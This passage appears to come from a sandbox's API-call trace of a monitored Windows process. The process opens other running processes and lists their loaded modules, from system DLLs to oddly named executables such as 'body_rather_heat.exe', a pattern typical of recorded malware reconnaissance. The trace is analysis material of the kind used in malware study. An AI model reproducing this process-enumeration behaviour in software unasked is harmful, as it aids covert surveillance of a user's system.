lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0053.766] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x24eec28, cb=0x18 | out: lpmodinfo=0x24eec28*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0053.768] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0053.770] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0053.772] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x218 [0053.772] EnumProcessModules (in: hProcess=0x218, lphModule=0x24f1d78, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24f1d78, lpcbNeeded=0x41eb20) returned 1 [0053.780] GetModuleInformation (in: hProcess=0x218, hModule=0x47e00000, lpmodinfo=0x24f1fe8, cb=0x18 | out: lpmodinfo=0x24f1fe8*(lpBaseOfDll=0x47e00000, SizeOfImage=0x20000, EntryPoint=0x47e17d90)) returned 1 [0053.783] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x47e00000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="smss.exe") returned 0x8 [0053.786] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x47e00000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="\\SystemRoot\\System32\\smss.exe" (normalized: "c:\\windows\\system32\\smss.exe")) returned 0x1d [0053.795] CoTaskMemAlloc (cb=0x20c) returned 0x747860 [0053.795] GetSystemDirectoryW (in: lpBuffer=0x747860, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.795] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24f4780, cb=0x18 | out: lpmodinfo=0x24f4780*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.801] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.802] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.804] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d0) returned 0x218 [0053.804] EnumProcessModules (in: hProcess=0x218, lphModule=0x24f6d48, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24f6d48, lpcbNeeded=0x41eb20) returned 1 [0053.806] GetModuleInformation (in: hProcess=0x218, hModule=0xff550000, lpmodinfo=0x24f6fb8, cb=0x18 | out: lpmodinfo=0x24f6fb8*(lpBaseOfDll=0xff550000, SizeOfImage=0x53000, EntryPoint=0xff563310)) returned 1 [0053.806] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff550000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="services.exe") returned 0xc [0053.806] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff550000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe")) returned 0x20 [0053.806] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24f91c0, cb=0x18 | out: lpmodinfo=0x24f91c0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.807] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.807] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.807] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x24fb380, cb=0x18 | out: lpmodinfo=0x24fb380*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0053.808] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0053.808] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0053.808] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x24fd550, cb=0x18 | out: lpmodinfo=0x24fd550*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0053.809] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0053.809] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0053.809] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x24ff720, cb=0x18 | out: lpmodinfo=0x24ff720*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0053.810] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0053.810] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0053.811] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x2501938, cb=0x18 | out: lpmodinfo=0x2501938*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0053.811] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0053.812] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0053.812] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x2503af8, cb=0x18 | out: lpmodinfo=0x2503af8*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0053.813] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0053.813] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0053.814] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x2505cb8, cb=0x18 | out: lpmodinfo=0x2505cb8*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0053.814] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0053.815] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0053.816] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x2507e78, cb=0x18 | out: lpmodinfo=0x2507e78*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0053.816] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0053.817] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0053.818] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x250a0d0, cb=0x18 | out: lpmodinfo=0x250a0d0*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0053.818] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0053.819] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0053.820] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd620000, lpmodinfo=0x250c2a0, cb=0x18 | out: lpmodinfo=0x250c2a0*(lpBaseOfDll=0x7fefd620000, SizeOfImage=0x19000, EntryPoint=0x7fefd621020)) returned 1 [0053.820] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd620000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="scext.dll") returned 0x9 [0053.821] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd620000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\scext.dll" (normalized: "c:\\windows\\system32\\scext.dll")) returned 0x1d [0053.822] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x250e460, cb=0x18 | out: lpmodinfo=0x250e460*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0053.823] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0053.824] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0053.825] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x2510620, cb=0x18 | out: lpmodinfo=0x2510620*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0053.825] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0053.826] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0053.827] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x25127e0, cb=0x18 | out: lpmodinfo=0x25127e0*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0053.828] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0053.829] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0053.830] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x2514990, cb=0x18 | out: lpmodinfo=0x2514990*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0053.831] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0053.832] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0053.832] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x2516b68, cb=0x18 | out: lpmodinfo=0x2516b68*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0053.833] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="Secur32.dll") returned 0xb [0053.834] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0053.835] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd5a0000, lpmodinfo=0x2518d28, cb=0x18 | out: lpmodinfo=0x2518d28*(lpBaseOfDll=0x7fefd5a0000, SizeOfImage=0x67000, EntryPoint=0x7fefd5a1010)) returned 1 [0053.836] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd5a0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="SCESRV.dll") returned 0xa [0053.837] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd5a0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SCESRV.dll" (normalized: "c:\\windows\\system32\\scesrv.dll")) returned 0x1e [0053.839] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd570000, lpmodinfo=0x251b000, cb=0x18 | out: lpmodinfo=0x251b000*(lpBaseOfDll=0x7fefd570000, SizeOfImage=0x23000, EntryPoint=0x7fefd571198)) returned 1 [0053.840] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd570000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="srvcli.dll") returned 0xa [0053.841] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd570000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")) returned 0x1e [0053.842] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x251d1c0, cb=0x18 | out: lpmodinfo=0x251d1c0*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0053.843] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0053.844] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0053.845] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x251f380, cb=0x18 | out: lpmodinfo=0x251f380*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0053.847] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0053.848] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0053.849] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x2521540, cb=0x18 | out: lpmodinfo=0x2521540*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0053.850] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0053.851] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0053.853] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x2523710, cb=0x18 | out: lpmodinfo=0x2523710*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0053.854] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0053.855] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0053.857] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd260000, lpmodinfo=0x25258d0, cb=0x18 | out: lpmodinfo=0x25258d0*(lpBaseOfDll=0x7fefd260000, SizeOfImage=0x2f000, EntryPoint=0x7fefd261064)) returned 1 [0053.858] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd260000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="AUTHZ.dll") returned 0x9 [0053.859] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd260000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AUTHZ.dll" (normalized: "c:\\windows\\system32\\authz.dll")) returned 0x1d [0053.861] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc30000, lpmodinfo=0x2527a90, cb=0x18 | out: lpmodinfo=0x2527a90*(lpBaseOfDll=0x7fefcc30000, SizeOfImage=0x39000, EntryPoint=0x7fefcc3c0f0)) returned 1 [0053.862] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc30000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="UBPM.dll") returned 0x8 [0053.863] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc30000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UBPM.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")) returned 0x1c [0053.865] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x2529c50, cb=0x18 | out: lpmodinfo=0x2529c50*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0053.866] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0053.868] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0053.869] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb00000, lpmodinfo=0x252be20, cb=0x18 | out: lpmodinfo=0x252be20*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0053.871] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb00000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0053.872] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb00000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0053.874] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x252dff0, cb=0x18 | out: lpmodinfo=0x252dff0*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0053.875] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0053.877] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0053.878] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x25301b0, cb=0x18 | out: lpmodinfo=0x25301b0*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0053.880] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0053.881] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0053.883] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x2532370, cb=0x18 | out: lpmodinfo=0x2532370*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0053.885] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0053.886] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0053.888] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd010000, lpmodinfo=0x2534520, cb=0x18 | out: lpmodinfo=0x2534520*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0053.890] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd010000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0053.891] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd010000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0053.893] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca10000, lpmodinfo=0x25366e0, cb=0x18 | out: lpmodinfo=0x25366e0*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0053.895] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca10000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0053.896] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca10000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0053.898] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd000000, lpmodinfo=0x25388b0, cb=0x18 | out: lpmodinfo=0x25388b0*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0053.900] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd000000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0053.903] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd000000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0053.904] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa44) returned 0x218 [0053.905] EnumProcessModules (in: hProcess=0x218, lphModule=0x253b8b8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x253b8b8, lpcbNeeded=0x41eb20) returned 1 [0053.905] GetModuleInformation (in: hProcess=0x218, hModule=0xda0000, lpmodinfo=0x253bb28, cb=0x18 | out: lpmodinfo=0x253bb28*(lpBaseOfDll=0xda0000, SizeOfImage=0x17000, EntryPoint=0xda14a1)) returned 1 [0053.905] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xda0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="edcsvr.exe") returned 0xa [0053.906] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xda0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\edcsvr.exe" (normalized: "c:\\program files\\reference assemblies\\edcsvr.exe")) returned 0x30 [0053.906] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x253dd48, cb=0x18 | out: lpmodinfo=0x253dd48*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.906] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.906] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.907] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x253ff08, cb=0x18 | out: lpmodinfo=0x253ff08*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0053.907] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0053.907] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0053.908] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x25420c8, cb=0x18 | out: lpmodinfo=0x25420c8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0053.908] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0053.909] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0053.909] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2544298, cb=0x18 | out: lpmodinfo=0x2544298*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0053.909] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0053.910] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0053.910] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x218 [0053.910] EnumProcessModules (in: hProcess=0x218, lphModule=0x25469c0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25469c0, lpcbNeeded=0x41eb20) returned 1 [0053.911] GetModuleInformation (in: hProcess=0x218, hModule=0x8c0000, lpmodinfo=0x2546c30, cb=0x18 | out: lpmodinfo=0x2546c30*(lpBaseOfDll=0x8c0000, SizeOfImage=0x17000, EntryPoint=0x8c14a1)) returned 1 [0053.911] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x8c0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="body_rather_heat.exe") returned 0x14 [0053.911] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x8c0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Firefox\\body_rather_heat.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\body_rather_heat.exe")) returned 0x3b [0053.912] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2548e78, 